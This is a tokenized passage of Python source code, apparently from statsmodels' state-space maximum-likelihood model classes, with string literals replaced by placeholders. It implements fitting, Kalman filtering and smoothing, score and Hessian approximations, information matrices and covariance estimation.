loglikelihood_burn ( self , value ) : <EOL> self . ssm . loglikelihood_burn = value <EOL> @ property <EOL> def tolerance ( self ) : <EOL> return self . ssm . tolerance <EOL> @ tolerance . setter <EOL> def tolerance ( self , value ) : <EOL> self . ssm . tolerance = value <EOL> def fit ( self , start_params = None , transformed = True , <EOL> cov_type = '<STR_LIT>' , cov_kwds = None , method = '<STR_LIT>' , maxiter = <NUM_LIT:50> , <EOL> full_output = <NUM_LIT:1> , disp = <NUM_LIT:5> , callback = None , return_params = False , <EOL> optim_score = None , optim_complex_step = None , optim_hessian = None , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if start_params is None : <EOL> start_params = self . start_params <EOL> transformed = True <EOL> if optim_score is None and method == '<STR_LIT>' : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> elif optim_score is None : <EOL> optim_score = '<STR_LIT>' <EOL> elif optim_score not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if optim_hessian not in [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if optim_complex_step is None : <EOL> optim_complex_step = not self . ssm . _complex_endog <EOL> elif optim_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if transformed : <EOL> start_params = self . untransform_params ( np . array ( start_params ) ) <EOL> flags = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : optim_score , <EOL> '<STR_LIT>' : optim_complex_step <EOL> } <EOL> if optim_hessian is not None : <EOL> flags [ '<STR_LIT>' ] = optim_hessian <EOL> fargs = ( flags , ) <EOL> mlefit = super ( MLEModel , self ) . fit ( start_params , method = method , <EOL> fargs = fargs , <EOL> maxiter = maxiter , <EOL> full_output = full_output , <EOL> disp = disp , callback = callback , <EOL> skip_hessian = True , ** kwargs ) <EOL> if return_params : <EOL> return self . transform_params ( mlefit . params ) <EOL> else : <EOL> res = self . smooth ( mlefit . params , transformed = False , <EOL> cov_type = cov_type , cov_kwds = cov_kwds ) <EOL> res . mlefit = mlefit <EOL> res . mle_retvals = mlefit . mle_retvals <EOL> res . mle_settings = mlefit . mle_settings <EOL> return res <EOL> def filter ( self , params , transformed = True , complex_step = False , <EOL> cov_type = None , cov_kwds = None , return_ssm = False , <EOL> results_class = None , results_wrapper_class = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> self . data . param_names = self . param_names <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> result = self . ssm . filter ( complex_step = complex_step , ** kwargs ) <EOL> if not return_ssm : <EOL> result_kwargs = { } <EOL> if cov_type is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_type <EOL> if cov_kwds is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_kwds <EOL> if results_class is None : <EOL> results_class = MLEResults <EOL> if results_wrapper_class is None : <EOL> results_wrapper_class = MLEResultsWrapper <EOL> result = results_wrapper_class ( <EOL> results_class ( self , params , result , ** result_kwargs ) <EOL> ) <EOL> return result <EOL> def smooth ( self , params , transformed = True , complex_step = False , <EOL> cov_type = None , cov_kwds = None , return_ssm = False , <EOL> results_class = None , results_wrapper_class = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> self . data . param_names = self . param_names <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> result = self . ssm . smooth ( complex_step = complex_step , ** kwargs ) <EOL> if not return_ssm : <EOL> result_kwargs = { } <EOL> if cov_type is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_type <EOL> if cov_kwds is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_kwds <EOL> if results_class is None : <EOL> results_class = MLEResults <EOL> if results_wrapper_class is None : <EOL> results_wrapper_class = MLEResultsWrapper <EOL> result = results_wrapper_class ( <EOL> results_class ( self , params , result , ** result_kwargs ) <EOL> ) <EOL> return result <EOL> def loglike ( self , params , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> argnames = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if isinstance ( args [ <NUM_LIT:0> ] , dict ) : <EOL> flags = args [ <NUM_LIT:0> ] <EOL> else : <EOL> flags = dict ( zip ( argnames , args ) ) <EOL> transformed = flags . get ( '<STR_LIT>' , True ) <EOL> complex_step = flags . get ( '<STR_LIT>' , True ) <EOL> for name , value in flags . items ( ) : <EOL> if name in kwargs : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> transformed = kwargs . pop ( '<STR_LIT>' , True ) <EOL> complex_step = kwargs . pop ( '<STR_LIT>' , True ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> loglike = self . ssm . loglike ( complex_step = complex_step , ** kwargs ) <EOL> return loglike <EOL> def loglikeobs ( self , params , transformed = True , complex_step = False , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> return self . ssm . loglikeobs ( complex_step = complex_step , ** kwargs ) <EOL> def _forecasts_error_partial_derivatives ( self , params , transformed = True , <EOL> approx_complex_step = None , <EOL> approx_centered = False , <EOL> res = None , ** kwargs ) : <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = transformed <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if approx_complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> if res is None : <EOL> self . update ( params , transformed = transformed , <EOL> complex_step = approx_complex_step ) <EOL> res = self . ssm . filter ( complex_step = approx_complex_step , ** kwargs ) <EOL> n = len ( params ) <EOL> partials_forecasts_error = ( <EOL> np . zeros ( ( self . k_endog , self . nobs , n ) ) <EOL> ) <EOL> partials_forecasts_error_cov = ( <EOL> np . zeros ( ( self . k_endog , self . k_endog , self . nobs , n ) ) <EOL> ) <EOL> if approx_complex_step : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:2> , None , n ) <EOL> increments = np . identity ( n ) * <NUM_LIT> * epsilon <EOL> for i , ih in enumerate ( increments ) : <EOL> self . update ( params + ih , transformed = transformed , <EOL> complex_step = True ) <EOL> _res = self . ssm . filter ( complex_step = True , ** kwargs ) <EOL> partials_forecasts_error [ : , : , i ] = ( <EOL> _res . forecasts_error . imag / epsilon [ i ] <EOL> ) <EOL> partials_forecasts_error_cov [ : , : , : , i ] = ( <EOL> _res . forecasts_error_cov . imag / epsilon [ i ] <EOL> ) <EOL> elif not approx_centered : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:2> , None , n ) <EOL> ei = np . zeros ( ( n , ) , float ) <EOL> for i in range ( n ) : <EOL> ei [ i ] = epsilon [ i ] <EOL> self . update ( params + ei , transformed = transformed , <EOL> complex_step = False ) <EOL> _res = self . ssm . filter ( complex_step = False , ** kwargs ) <EOL> partials_forecasts_error [ : , : , i ] = ( <EOL> _res . forecasts_error - res . forecasts_error ) / epsilon [ i ] <EOL> partials_forecasts_error_cov [ : , : , : , i ] = ( <EOL> _res . forecasts_error_cov - <EOL> res . forecasts_error_cov ) / epsilon [ i ] <EOL> ei [ i ] = <NUM_LIT:0.0> <EOL> else : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:3> , None , n ) / <NUM_LIT> <EOL> ei = np . zeros ( ( n , ) , float ) <EOL> for i in range ( n ) : <EOL> ei [ i ] = epsilon [ i ] <EOL> self . update ( params + ei , transformed = transformed , <EOL> complex_step = False ) <EOL> _res1 = self . ssm . filter ( complex_step = False , ** kwargs ) <EOL> self . update ( params - ei , transformed = transformed , <EOL> complex_step = False ) <EOL> _res2 = self . ssm . filter ( complex_step = False , ** kwargs ) <EOL> partials_forecasts_error [ : , : , i ] = ( <EOL> ( _res1 . forecasts_error - _res2 . forecasts_error ) / <EOL> ( <NUM_LIT:2> * epsilon [ i ] ) ) <EOL> partials_forecasts_error_cov [ : , : , : , i ] = ( <EOL> ( _res1 . forecasts_error_cov - _res2 . forecasts_error_cov ) / <EOL> ( <NUM_LIT:2> * epsilon [ i ] ) ) <EOL> ei [ i ] = <NUM_LIT:0.0> <EOL> return partials_forecasts_error , partials_forecasts_error_cov <EOL> def observed_information_matrix ( self , params , transformed = True , <EOL> approx_complex_step = None , <EOL> approx_centered = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> n = len ( params ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = transformed <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . update ( params , transformed = transformed , <EOL> complex_step = approx_complex_step ) <EOL> if approx_complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> res = self . ssm . filter ( complex_step = approx_complex_step , ** kwargs ) <EOL> dtype = self . ssm . dtype <EOL> inv_forecasts_error_cov = res . forecasts_error_cov . copy ( ) <EOL> partials_forecasts_error , partials_forecasts_error_cov = ( <EOL> self . _forecasts_error_partial_derivatives ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , res = res , ** kwargs ) ) <EOL> tmp = np . zeros ( ( self . k_endog , self . k_endog , self . nobs , n ) , dtype = dtype ) <EOL> information_matrix = np . zeros ( ( n , n ) , dtype = dtype ) <EOL> for t in range ( self . ssm . loglikelihood_burn , self . nobs ) : <EOL> inv_forecasts_error_cov [ : , : , t ] = ( <EOL> np . linalg . inv ( res . forecasts_error_cov [ : , : , t ] ) <EOL> ) <EOL> for i in range ( n ) : <EOL> tmp [ : , : , t , i ] = np . dot ( <EOL> inv_forecasts_error_cov [ : , : , t ] , <EOL> partials_forecasts_error_cov [ : , : , t , i ] <EOL> ) <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> information_matrix [ i , j ] += ( <EOL> <NUM_LIT:0.5> * np . trace ( np . dot ( tmp [ : , : , t , i ] , <EOL> tmp [ : , : , t , j ] ) ) <EOL> ) <EOL> information_matrix [ i , j ] += np . inner ( <EOL> partials_forecasts_error [ : , t , i ] , <EOL> np . dot ( inv_forecasts_error_cov [ : , : , t ] , <EOL> partials_forecasts_error [ : , t , j ] ) <EOL> ) <EOL> return information_matrix / ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> def opg_information_matrix ( self , params , transformed = True , <EOL> approx_complex_step = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if approx_complex_step is None : <EOL> approx_complex_step = transformed <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> score_obs = self . score_obs ( params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> ** kwargs ) . transpose ( ) <EOL> return ( <EOL> np . inner ( score_obs , score_obs ) / <EOL> ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> ) <EOL> def _score_complex_step ( self , params , ** kwargs ) : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT> , None , len ( params ) ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> return approx_fprime_cs ( params , self . loglike , epsilon = epsilon , <EOL> kwargs = kwargs ) <EOL> def _score_finite_difference ( self , params , approx_centered = False , <EOL> ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> return approx_fprime ( params , self . loglike , kwargs = kwargs , <EOL> centered = approx_centered ) <EOL> def _score_harvey ( self , params , approx_complex_step = True , ** kwargs ) : <EOL> score_obs = self . _score_obs_harvey ( <EOL> params , approx_complex_step = approx_complex_step , ** kwargs ) <EOL> return np . sum ( score_obs , axis = <NUM_LIT:0> ) <EOL> def _score_obs_harvey ( self , params , approx_complex_step = True , <EOL> approx_centered = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> n = len ( params ) <EOL> self . update ( params , transformed = True , complex_step = approx_complex_step ) <EOL> if approx_complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> res = self . ssm . filter ( complex_step = approx_complex_step , ** kwargs ) <EOL> dtype = self . ssm . dtype <EOL> partials_forecasts_error , partials_forecasts_error_cov = ( <EOL> self . _forecasts_error_partial_derivatives ( <EOL> params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , res = res , ** kwargs ) ) <EOL> partials = np . zeros ( ( self . nobs , n ) ) <EOL> k_endog = self . k_endog <EOL> for t in range ( self . nobs ) : <EOL> for i in range ( n ) : <EOL> inv_forecasts_error_cov = np . linalg . inv ( <EOL> res . forecasts_error_cov [ : , : , t ] ) <EOL> partials [ t , i ] += np . trace ( np . dot ( <EOL> np . dot ( inv_forecasts_error_cov , <EOL> partials_forecasts_error_cov [ : , : , t , i ] ) , <EOL> ( np . eye ( k_endog ) - <EOL> np . dot ( inv_forecasts_error_cov , <EOL> np . outer ( res . forecasts_error [ : , t ] , <EOL> res . forecasts_error [ : , t ] ) ) ) ) ) <EOL> partials [ t , i ] += <NUM_LIT:2> * np . dot ( <EOL> partials_forecasts_error [ : , t , i ] , <EOL> np . dot ( inv_forecasts_error_cov , res . forecasts_error [ : , t ] ) ) <EOL> return - partials / <NUM_LIT> <EOL> def score ( self , params , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> argnames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if isinstance ( args [ <NUM_LIT:0> ] , dict ) : <EOL> flags = args [ <NUM_LIT:0> ] <EOL> flags [ '<STR_LIT>' ] = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> flags = dict ( zip ( argnames , args ) ) <EOL> transformed = flags . get ( '<STR_LIT>' , True ) <EOL> method = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = flags . get ( '<STR_LIT>' , None ) <EOL> approx_centered = flags . get ( '<STR_LIT>' , True ) <EOL> for name , value in flags . items ( ) : <EOL> if name in kwargs : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> transformed = kwargs . pop ( '<STR_LIT>' , True ) <EOL> method = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = kwargs . pop ( '<STR_LIT>' , None ) <EOL> approx_centered = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = not self . ssm . _complex_endog <EOL> if approx_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not transformed : <EOL> transform_score = self . transform_jacobian ( params ) <EOL> params = self . transform_params ( params ) <EOL> if method == '<STR_LIT>' : <EOL> score = self . _score_harvey ( <EOL> params , approx_complex_step = approx_complex_step , ** kwargs ) <EOL> elif method == '<STR_LIT>' and approx_complex_step : <EOL> score = self . _score_complex_step ( params , ** kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> score = self . _score_finite_difference ( <EOL> params , approx_centered = approx_centered , ** kwargs ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> if not transformed : <EOL> score = np . dot ( transform_score , score ) <EOL> return score <EOL> def score_obs ( self , params , method = '<STR_LIT>' , transformed = True , <EOL> approx_complex_step = None , approx_centered = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = not self . ssm . _complex_endog <EOL> if approx_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if method == '<STR_LIT>' : <EOL> score = self . _score_obs_harvey ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , ** kwargs ) <EOL> elif method == '<STR_LIT>' and approx_complex_step : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT> , None , len ( params ) ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> score = approx_fprime_cs ( params , self . loglikeobs , epsilon = epsilon , <EOL> kwargs = kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> kwargs [ '<STR_LIT>' ] = transformed <EOL> score = approx_fprime ( params , self . loglikeobs , kwargs = kwargs , <EOL> centered = approx_centered ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return score <EOL> def hessian ( self , params , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> argnames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if isinstance ( args [ <NUM_LIT:0> ] , dict ) : <EOL> flags = args [ <NUM_LIT:0> ] <EOL> flags [ '<STR_LIT>' ] = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> flags = dict ( zip ( argnames , args ) ) <EOL> transformed = flags . get ( '<STR_LIT>' , True ) <EOL> method = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = flags . get ( '<STR_LIT>' , None ) <EOL> approx_centered = flags . get ( '<STR_LIT>' , True ) <EOL> for name , value in flags . items ( ) : <EOL> if name in kwargs : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> transformed = kwargs . pop ( '<STR_LIT>' , False ) <EOL> method = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = kwargs . pop ( '<STR_LIT>' , None ) <EOL> approx_centered = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = not self . ssm . _complex_endog <EOL> if approx_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if method == '<STR_LIT>' : <EOL> hessian = self . _hessian_oim ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , ** kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> hessian = self . _hessian_opg ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , ** kwargs ) <EOL> elif method == '<STR_LIT>' and approx_complex_step : <EOL> return self . _hessian_complex_step ( <EOL> params , transformed = transformed , ** kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> return self . _hessian_finite_difference ( <EOL> params , transformed = transformed , <EOL> approx_centered = approx_centered , ** kwargs ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return hessian <EOL> def _hessian_oim ( self , params , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return - self . observed_information_matrix ( params , ** kwargs ) <EOL> def _hessian_opg ( self , params , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return - self . opg_information_matrix ( params , ** kwargs ) <EOL> def _hessian_finite_difference ( self , params , approx_centered = False , <EOL> ** kwargs ) : <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> warnings . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not approx_centered : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:3> , None , len ( params ) ) <EOL> else : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:4> , None , len ( params ) ) / <NUM_LIT:2> <EOL> hessian = approx_fprime ( params , self . _score_finite_difference , <EOL> epsilon = epsilon , kwargs = kwargs , centered = approx_centered ) <EOL> return hessian / ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> def _hessian_complex_step ( self , params , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> epsilon = _get_epsilon ( params , <NUM_LIT> , None , len ( params ) ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> hessian = approx_hess_cs ( <EOL> params , self . loglike , epsilon = epsilon , kwargs = kwargs ) <EOL> return hessian / ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> @ property <EOL> def start_params ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return self . _start_params <EOL> else : <EOL> raise NotImplementedError <EOL> @ property <EOL> def param_names ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> return self . _param_names <EOL> else : <EOL> try : <EOL> names = [ '<STR_LIT>' % i for i in range ( len ( self . start_params ) ) ] <EOL> except NotImplementedError : <EOL> names = [ ] <EOL> return names <EOL> def transform_jacobian ( self , unconstrained , approx_centered = False ) : <EOL> """<STR_LIT>""" <EOL> return approx_fprime ( unconstrained , self . transform_params , <EOL> centered = approx_centered ) <EOL> def transform_params ( self , unconstrained ) : <EOL> """<STR_LIT>""" <EOL> return np . array ( unconstrained , ndmin = <NUM_LIT:1> ) <EOL> def untransform_params ( self , constrained ) : <EOL> """<STR_LIT>""" <EOL> return np . array ( constrained , ndmin = <NUM_LIT:1> ) <EOL> def update ( self , params , transformed = True , complex_step = False ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> return params <EOL> def simulate ( self , params , nsimulations , measurement_shocks = None , <EOL> state_shocks = None , initial_state = None ) : <EOL> """<STR_LIT>""" <EOL> self . update ( params ) <EOL> simulated_obs , simulated_states = self . ssm . simulate ( <EOL> nsimulations , measurement_shocks , state_shocks , initial_state ) <EOL> if simulated_obs . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> simulated_obs = simulated_obs [ <NUM_LIT:0> , : ] <EOL> else : <EOL> simulated_obs = simulated_obs . T <EOL> return simulated_obs <EOL> def impulse_responses ( self , params , steps = <NUM_LIT:1> , impulse = <NUM_LIT:0> , <EOL> orthogonalized = False , cumulative = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . update ( params ) <EOL> return self . ssm . impulse_responses ( <EOL> steps , impulse , orthogonalized , cumulative , ** kwargs ) <EOL> @ classmethod <EOL> def from_formula ( cls , formula , data , subset = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class MLEResults ( tsbase . TimeSeriesModelResults ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , model , params , results , cov_type = '<STR_LIT>' , <EOL> cov_kwds = None , ** kwargs ) : <EOL> self . data = model . data <EOL> tsbase . TimeSeriesModelResults . __init__ ( self , model , params , <EOL> normalized_cov_params = None , <EOL> scale = <NUM_LIT:1.> ) <EOL> self . filter_results = results <EOL> if isinstance ( results , SmootherResults ) : <EOL> self . smoother_results = results <EOL> else : <EOL> self . smoother_results = None <EOL> self . nobs = model . nobs <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . cov_kwds = { } <EOL> self . cov_type = cov_type <EOL> self . _cache = resettable_cache ( ) <EOL> if cov_kwds is None : <EOL> cov_kwds = { } <EOL> self . _cov_approx_complex_step = ( <EOL> cov_kwds . pop ( '<STR_LIT>' , True ) ) <EOL> self . _cov_approx_centered = cov_kwds . pop ( '<STR_LIT>' , False ) <EOL> try : <EOL> self . _rank = None <EOL> self . _get_robustcov_results ( cov_type = cov_type , use_self = True , <EOL> ** cov_kwds ) <EOL> except np . linalg . LinAlgError : <EOL> self . _rank = <NUM_LIT:0> <EOL> k_params = len ( self . params ) <EOL> self . cov_params_default = np . zeros ( ( k_params , k_params ) ) * np . nan <EOL> self . cov_kwds [ '<STR_LIT>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for name in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> setattr ( self , name , getattr ( self . filter_results , name , None ) ) <EOL> def _get_robustcov_results ( self , cov_type = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> import statsmodels . stats . sandwich_covariance as sw <EOL> use_self = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if use_self : <EOL> res = self <EOL> else : <EOL> raise NotImplementedError <EOL> res = self . __class__ ( <EOL> self . model , self . params , <EOL> normalized_cov_params = self . normalized_cov_params , <EOL> scale = self . scale ) <EOL> res . cov_type = cov_type <EOL> res . cov_kwds = { } <EOL> approx_complex_step = self . _cov_approx_complex_step <EOL> if approx_complex_step : <EOL> approx_type_str = '<STR_LIT>' <EOL> elif self . _cov_approx_centered : <EOL> approx_type_str = '<STR_LIT>' <EOL> else : <EOL> approx_type_str = '<STR_LIT>' <EOL> k_params = len ( self . params ) <EOL> if k_params == <NUM_LIT:0> : <EOL> res . cov_params_default = np . zeros ( ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> res . _rank = <NUM_LIT:0> <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' ) <EOL> elif cov_type == '<STR_LIT:none>' : <EOL> res . cov_params_default = np . zeros ( ( k_params , k_params ) ) * np . nan <EOL> res . _rank = np . nan <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_approx <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_oim <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_opg <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str <EOL> ) <EOL> elif self . cov_type == '<STR_LIT>' or self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_robust_oim <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> elif self . cov_type == '<STR_LIT>' : <EOL> res . cov_params_default = res . cov_params_robust <EOL> res . cov_kwds [ '<STR_LIT:description>' ] = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % approx_type_str ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return res <EOL> @ cache_readonly <EOL> def aic ( self ) : <EOL> """<STR_LIT>""" <EOL> return aic ( self . llf , self . nobs , self . params . shape [ <NUM_LIT:0> ] ) <EOL> @ cache_readonly <EOL> def bic ( self ) : <EOL> """<STR_LIT>""" <EOL> return bic ( self . llf , self . nobs , self . params . shape [ <NUM_LIT:0> ] ) <EOL> def _cov_params_approx ( self , approx_complex_step = True , <EOL> approx_centered = False ) : <EOL> nobs = ( self . model . nobs - self . filter_results . loglikelihood_burn ) <EOL> if approx_complex_step : <EOL> evaluated_hessian = self . model . _hessian_complex_step ( <EOL> self . params , transformed = True <EOL> ) <EOL> else : <EOL> evaluated_hessian = self . model . _hessian_finite_difference ( <EOL> self . params , transformed = True , <EOL> approx_centered = approx_centered <EOL> ) <EOL> self . model . update ( self . params ) <EOL> neg_cov , singular_values = pinv_extended ( nobs * evaluated_hessian ) <EOL> if self . _rank is None : <EOL> self . _rank = np . linalg . matrix_rank ( np . diag ( 